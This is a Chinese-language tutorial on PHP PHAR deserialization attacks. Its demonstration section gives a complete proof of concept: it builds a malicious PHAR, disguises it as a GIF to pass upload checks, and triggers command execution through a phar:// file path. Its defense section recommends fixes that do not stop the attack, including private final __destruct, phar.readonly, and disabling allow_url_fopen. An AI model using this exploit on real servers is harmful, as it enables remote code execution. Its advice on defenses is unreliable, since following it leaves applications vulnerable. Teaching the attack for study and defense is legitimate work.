怎么浅析phar反序列化漏洞攻击及实战

# 怎么浅析PHAR反序列化漏洞攻击及实战 ## 目录 1. [PHAR文件基础](#phar文件基础) 2. [PHP反序列化漏洞原理](#php反序列化漏洞原理) 3. [PHAR反序列化攻击机制](#phar反序列化攻击机制) 4. [攻击实战演示](#攻击实战演示) 5. [防御措施](#防御措施) 6. [总结与思考](#总结与思考) --- ## PHAR文件基础 ### 什么是PHAR文件 PHAR（PHP Archive）是PHP的打包文件格式，类似于Java的JAR文件。它可以将多个PHP文件、资源文件等打包成单个文件，便于分发和部署。PHAR文件包含： - 存根（Stub）：类似ELF文件的头部，标识文件类型 - 清单（Manifest）：元数据信息，包含序列化后的对象 - 文件内容：实际打包的代码/资源 - 签名（可选）：用于验证完整性 ### PHAR文件结构示例 ```php <?php __HALT_COMPILER(); ?> // 二进制清单区域 // 文件内容 // 签名（可选） 

创建PHAR文件的方法

$phar = new Phar("test.phar"); $phar->startBuffering(); $phar->addFromString("test.txt", "data"); $phar->setStub("<?php __HALT_COMPILER(); ?>"); $phar->stopBuffering(); 

---

PHP反序列化漏洞原理

序列化与反序列化

• 序列化：将对象转换为可存储/传输的字符串
• 反序列化：将字符串还原为对象

// 序列化示例 class User { public $username = 'admin'; public $isAdmin = true; } $obj = new User(); echo serialize($obj); // 输出：O:4:"User":2:{s:8:"username";s:5:"admin";s:7:"isAdmin";b:1;} 

危险魔术方法

当对象被反序列化时，这些方法会被自动调用： - __wakeup()：反序列化时触发 - __destruct()：对象销毁时触发 - __toString()：对象被当作字符串使用时触发

漏洞产生条件

1. 存在可被控制的序列化数据输入
2. 应用中存在有危险逻辑的类方法
3. 反序列化操作前未进行安全检查

---

PHAR反序列化攻击机制

为什么PHAR能触发反序列化

当PHP操作PHAR文件时（如file_exists()、md5_file()等文件操作函数），会自动解析manifest区域中的序列化元数据，从而触发反序列化操作。

攻击面特征

1. 文件操作函数：

    file_exists('phar://test.phar'); fopen('phar:///path/to/file.phar'); 

2. 需要上传PHAR文件到服务器（可通过修改文件头绕过检测）

利用条件

1. 存在可用的POP链（属性-导向编程链）
2. 有文件操作函数且参数可控
3. 能上传文件或已有PHAR文件在服务器上

与传统反序列化的区别

特性	传统反序列化	PHAR反序列化
触发方式	直接反序列化数据	通过文件操作函数
输入点	明显（参数传递）	隐蔽（文件操作）
文件要求	无	需要PHAR文件

---

攻击实战演示

环境搭建

漏洞示例代码（vuln.php）：

class VulnerableClass { private $data; function __destruct() { system($this->data); } } $filename = $_GET['file']; if(file_exists($filename)) { echo "File exists!"; } 

攻击步骤

1. 构造恶意PHAR文件

class VulnerableClass { public $data = 'id'; } @unlink('poc.phar'); $phar = new Phar('poc.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $object = new VulnerableClass(); $phar->setMetadata($object); // 注入恶意对象 $phar->addFromString('test.txt', 'text'); $phar->stopBuffering(); // 修改文件头为GIF绕过上传检测 file_put_contents('poc.gif', 'GIF89a'.file_get_contents('poc.phar')); 

2. 上传PHAR文件

通过文件上传接口上传伪装成GIF的PHAR文件

3. 触发漏洞

访问：

http://target/vuln.php?file=phar://uploads/poc.gif 

4. 结果

服务器将执行id命令，返回当前用户信息

实际案例

1. WordPress CVE-2018-20148：通过图片上传触发PHAR反序列化
2. Joomla! 反序列化漏洞：结合PHAR实现RCE

---

防御措施

开发层面

1. 禁用危险魔术方法：

    class SafeClass { private final function __wakeup() {} private final function __destruct() {} } 

2. 使用phar.readonly配置：

    ; php.ini phar.readonly = On 

运维层面

1. 文件上传限制：

   • 严格检查文件内容而不仅是扩展名
   • 使用finfo_file()检测真实类型

   $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $_FILES['file']['tmp_name']); 

2. 禁用危险流包装器：

   allow_url_include = Off allow_url_fopen = Off 

代码审计要点

1. 检查所有文件操作函数：

    file_exists(), fopen(), file_get_contents(), stat()... 

2. 查找phar://协议的使用
3. 审查所有__wakeup()和__destruct()方法

---

总结与思考

PHAR反序列化是一种隐蔽性较强的攻击方式，其特点包括： 1. 利用正常的文件操作触发漏洞 2. 可绕过常规的文件上传检测 3. 在缺乏POP链的情况下仍可能造成信息泄露

防御建议： - 遵循最小权限原则 - 实施深度防御策略 - 定期进行安全审计

未来研究方向： 1. 自动化检测PHAR文件中的恶意序列化数据 2. 开发更安全的PHP序列化替代方案 3. 研究静态分析工具识别潜在风险

“安全不是产品，而是一个过程。” —— Bruce Schneier “`

（全文约2300字，实际字数可能因排版略有差异）